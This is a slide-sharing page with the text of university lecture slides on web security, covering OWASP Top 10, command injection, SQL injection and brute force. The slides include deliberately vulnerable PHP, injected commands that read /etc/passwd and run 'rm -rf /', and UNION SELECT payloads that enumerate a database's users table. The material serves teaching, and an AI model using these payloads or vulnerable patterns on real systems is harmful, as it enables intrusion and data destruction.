web security
play

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr - PowerPoint PPT Presentation

Oct 16, 2022 •289 likes •1.17k views

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen Some recent attacks 2 A game changer The Internet

  1. Web Security TDDC90 – Software Security Ulf Kargén Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen

  2. Some recent attacks… 2

  3. A game changer • The Internet was a game changer… • Code was no longer written only for OS, microchips, games, utilities, etc. • Code was no longer slowly acquired and installed, but executed on demand. • The amount of code that has been written for the web is staggering (backend and frontend). 3

  4. A game changer • As the web-presence-need gained extreme momentum, non- functional requirements such as quality and security were not prioritised. • Today, the Internet is used not only for web pages, but as a communication channel for services , smart-home devices, etc. • Many web services maintain databases of potentially sensitive personal information – a gold mine for attackers • The core web technologies are designed for serving simple stateless (static) web pages. • Modern web apps use a plethora of technologies to add statefulness and interactivity to web pages • Complexity breeds insecurity… 4

  5. No surprise • When you allow for so much code to be available and users are interacting with the code (input/output) … • … and you are collecting massive amounts of data… • .. it should not come as a surprise that there will be security and privacy issues. 5

  6. Vulnerabilities • We will look at a few common vulnerabilities, focusing on the OWASP Top 10 • Recognized as the de-facto standard list of most important web security problems • Some of the vulnerabilities will also be explored in the lab, including countermeasures 6

  7. Vulnerabilities OWASP Top 10, 2017: 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring 7

  8. A1: Injection Caused by lacking input validation when user-supplied data is used to craft strings that are later sent to a parser of some kind. ▪ Possible to “escape” out of the intended context if syntax characters are not filtered ▪ Can affect any kind of machine-readable input: ▪ OS commands ▪ SQL queries What we will ▪ LDAP look at in today’s ▪ XPath lecture ▪ XML ▪ NoSQL … ▪ 8

  9. Command execution/injection • Essentially, the vulnerability allows an attacker to execute any command at will. • This vulnerability is a cause of bad input validation and naïve programming. 9

  10. Command execution/injection <?php print(“Please specify name of file to delete”); $file = $_GET[‘filename’]; system(“ rm $file”); ?> • The intended use of the PHP script is for the user to send something like: index.php?filename=tmp.txt 10

  11. Command execution/injection <?php print(“Please specify name of file to delete”); $file = $_GET[‘filename’]; system(“ rm $file”); ?> • But what happens if an attacker sends: • index.php?filename=tmp.txt;cat /etc/passwd • Then the file tmp.txt will be removed, but as we have been able to concatenate “;cat / etc/passwd ”, it will also print the content of this file to the user. • This gives the attacker information about the system that it should not have, and this information can be used to stage attacks. 11

  12. Command execution/injection <?php print(“Please specify name of file to delete”); $file = $_GET[‘filename’]; system(“ rm $file”); ?> • Another possibility: • index.php?filename=index.html • Which would remove a vital part of the website. • Or if the server is running with higher than necessary privileges: • index.php?filename=index.html;rm – rf / • Which would remove everything on the file system. 12

  13. Command execution/injection - Consequences • The web server is hopefully running as a low-privilege user, however even so allowing injections can cause harm. • You can exploit vulnerabilities in the underlying OS without having an account on the system (e.g. it is possible to exploit pong in this way, without having direct access to the system). 13

  14. Command execution/injection - Mitigations • It would be easy if we simply disallowed any calls from the web application to the underlying OS, however: • Sometimes it is necessary (read/write files) • We may want call another tool such as image rescaling or network utility. • etc. • Validate input ( you will explore this in the lab ) 14

  15. SQL injection • A web server that speaks some programming language coupled with a database is the essentials of any post 90’s website. • SQL based databases have been, and still are, the most prevalent. • SQL based databases speak SQL (structured query language), and using SQL you can create tables, insert data into tables, update data in tables and delete data (and more…). 15

  16. SQL injection - Example • A server makes queries to a Query DB database depending on what a user requests. Server • A user searches for “book” • The server looks in the database for “book” Request • The server returns results for “book” • 1, Machine Learning, A probabilistic perspective • 2, Bayesian Networks and Decisions Graphs 16

  17. SQL injection - Example • Client request: http://example.com/search?key =‘book’ • Server code: <?php $keyword = $_GET[‘key’] $query = “SELECT * FROM ITEM WHERE TYPE = ‘$keyword’” $result = mysql_query($query) ?> • The query to the database is dynamically created depending on what the user input as ‘key’. • The query will be: SELECT * FROM ITEM WHERE TYPE = ‘book’; 17

  18. SQL injection - Example • Client: Actually, I am looking for items of type: ' UNION SELECT null, version() # • Server: Ok, I will create the query: SELECT * FROM ITEM WHERE TYPE = '' UNION SELECT null, version() #'; • 5.1.60 Was there an item of this type? 18

  19. SQL injection - Example • Client: Let’s try type: ' UNION SELECT null, user() # • Server: Ok, I will create the query: SELECT * FROM ITEM WHERE TYPE = '' UNION SELECT null, user() #'; • root@localhost We are getting results, but they are not items… 19

  20. SQL injection - Example • What is going on here? • An application vulnerable to a SQL injection is basically allowing the user to run any arbitrary query. • The culprit is again input validation… 20

  21. SQL injection <?php $keyword = $_GET[‘key’] $query = “SELECT * FROM ITEM WHERE TYPE = ‘$keyword’” $result = mysql_query($query) ?> The application treats input as SQL code, you will explore exploits and mitigations in the lab. 21

  22. SQL injection - Example • Client: Let’s try type: ' UNION SELECT null, database() # • Server: Ok, I will create the query: SELECT * FROM ITEM WHERE TYPE = '' UNION SELECT null, database() #'; • dvwa That is the name of the database… 22

  23. SQL injection - Example • Client: Let’s try type: ’ UNION SELECT null, table_name FROM information_schema.tables # • Server: Ok, I will create the query: SELECT * FROM ITEM WHERE TYPE = '' UNION SELECT null, table_name FROM information_schema.tables #’; • Long result with the name of every table in the database…. 23

  24. SQL injection - Example • Client: Let’s try type: ' UNION SELECT null, CONCAT(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name = 'users' # • Server: Ok, I will create the query: SELECT * FROM ITEM WHERE TYPE = '' UNION SELECT null, CONCAT(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name = 'users' #’; In the previous query we found a table called users, and now we are finding all the columns of this table… 24

  25. SQL injection - Example • The next step is obvious, try and query for the contents in the table ‘users’, but you will do this in the lab. 25

  26. A2: Broken Authentication Can be caused by poor security design For example, session tokens with too long lifetime • Makes session hijacking easier ⇨ Invalidate session token after logout or timeout! But frequently the problem is weak authentication mechanisms, allowing brute force attacks: • Exhaustive password guessing • Dictionary attacks • Credential stuffing 26

  27. Brute force • There exists many ways to authenticate users in systems, e.g. one-time tokens, biometric, etc. • On the web the most prevalent method is the username/password combination. In general a brute force attack tries every • combination of username/password until it is successful. • Variations: • Search attack • Rule-based search attack • Dictionary attack 27

  28. Brute force – Search attack • A search attack is the most basic form of brute force. • Given a character set (e.g. lower alpha charset [ abcdefghijklmnopqrstuvwxyz ] ) and a password length, then every possible combination is tried. 28

  29. Brute force – Search attack • Lower alpha + 3 character password: • aaa • aab • aac • aad • … • Slow, but it will at some point crack the password. 29

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

Network security Network security Foundations: what is security? cryptography Network Security Network Security authentication message integrity key distribution and certification Security in practice: Srinidhi Varadarajan

332 views • 6 slides
Security Security as term, Possible Security violations Authentication Criteria for

Security Security as term, Possible Security violations Authentication Criteria for

BS1 WS19/20 topic-based slides Security Security as term, Possible Security violations Authentication Criteria for Trust in Computer Systems Three hearts of Windows Security DACLs A Look at Security System is secure if

988 views • 20 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security WS 06/07 Seminar Prof. Dr.-Ing. Jana Dittmann &amp; Dr.-Ing. Claus Vielhauer with support from Tobias Scheidat

419 views • 16 slides
1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

Course Overview Course Requirements EECS 498-7/8 Cryptography and Network Security: www.citi.umich.edu/u/honey/security Principles and Practice (Third Edition) Computer Security Monday &amp; Friday, 9:00 10:30 William Stallings

670 views • 19 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security Foundations: what is security? cryptography authentication message integrity key distribution and certification Security in practice:

634 views • 36 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CSCE Intro to Computer Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies Security

472 views • 20 slides
SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in distributed systems arises from the desire to share resources Resources must be protected against unauthorized access, as enemies (attackers)

1.16k views • 67 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CPSC 410/611 Operating Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies

419 views • 19 slides
International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International Security What is security? Freedom from threats to core values? Contestation over referent object: Individual? State? System? How is security achieved?

715 views • 11 slides
Security 101 Definition of Information Security Information security is the protection of

Security 101 Definition of Information Security Information security is the protection of

Computing Services Information Security Office Security 101 Definition of Information Security Information security is the protection of information and systems from unauthorized access, disclosure, modification, destruction or disruption. The

469 views • 22 slides
Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety Sensitive Information Not for public or media release F.S. 119.071. Required by law, rule and regulation: Homeland Security Directive 5 and 8.

393 views • 11 slides
Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

ITS335 Intro. to Security Concepts Threats, Attacks, Assets Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 2

965 views • 34 slides
1 Todays schedule Technical infrastructure, education, 9 am - 10.30 am policy and APNIC

1 Todays schedule Technical infrastructure, education, 9 am - 10.30 am policy and APNIC

Finding out about each other.. Tell us about yourself.. Name, organisation? What kind of work do you do? Welcome to Why did you attend this tutorial? What do you hope to get out of the session today? Maximising your IP

755 views • 30 slides
SEARCH ENGINE OPTIMIZATION (SEO) WHAT I S S E O ? SEO is a methodology of strategies,

SEARCH ENGINE OPTIMIZATION (SEO) WHAT I S S E O ? SEO is a methodology of strategies,

SEARCH ENGINE OPTIMIZATION (SEO) WHAT I S S E O ? SEO is a methodology of strategies, techniques and tactics used to improve search engine ranking The goal is to increase the amount of visitors to a website if your placement is in a

1.03k views • 40 slides
Direct Link Networks Guevara Noubir CS 4700 &amp; CS 5700

Direct Link Networks Guevara Noubir CS 4700 &amp; CS 5700

Direct Link Networks Guevara Noubir CS 4700 &amp; CS 5700 Textbook: Computer Networks: A Systems Approach, L. Peterson, B. Davie, Morgan Kaufmann Chapter 2. Fundamentals of Computer Networks Direct

446 views • 30 slides
Information Retrieval Lecture 5 Recap of lecture 4 Query expansion Index construction

Information Retrieval Lecture 5 Recap of lecture 4 Query expansion Index construction

Information Retrieval Lecture 5 Recap of lecture 4 Query expansion Index construction This lecture Parametric and field searches Zones in documents Scoring documents: zone weighting Index support for scoring tf idf

790 views • 42 slides
Information Retrieval 70: :

Information Retrieval 70: :

Introduction to Information Retrieval Introduction to Information Retrieval Introduction to Information Retrieval 70: : 9:

609 views • 46 slides
Data Transmission Surasak Sanguanpong nguan@ku.ac.th http://www.cpe.ku.ac.th/~nguan Last

Data Transmission Surasak Sanguanpong nguan@ku.ac.th http://www.cpe.ku.ac.th/~nguan Last

Data Communications and Computer Networks 1/10 Data Transmission Surasak Sanguanpong nguan@ku.ac.th http://www.cpe.ku.ac.th/~nguan Last updated: Feb 8 2001 Applied Network Research Group Department of Computer

328 views • 9 slides
English Language - IGCSE Touching the Void (I) Viewpoint 1 st person account vs 3 rd person

English Language - IGCSE Touching the Void (I) Viewpoint 1 st person account vs 3 rd person

English Language - IGCSE Touching the Void (I) Viewpoint 1 st person account vs 3 rd person account 2 nd person accounts are normally instructional 1 st and 3 rd person accounts may contain 2 nd person passages biographical vs

1.57k views • 144 slides
Challenges in Bit-Precise Reasoning Armin Biere Johannes Kepler University Linz, Austria based

Challenges in Bit-Precise Reasoning Armin Biere Johannes Kepler University Linz, Austria based

Challenges in Bit-Precise Reasoning Armin Biere Johannes Kepler University Linz, Austria based on joined work with Aina Niemetz, Andreas Fr ohlich, Gergely Kov asznai, Mathias Preiner FMCAD 2014 EPFL, Lausanne, Switzerland Tuesday, 21

567 views • 33 slides

More recommend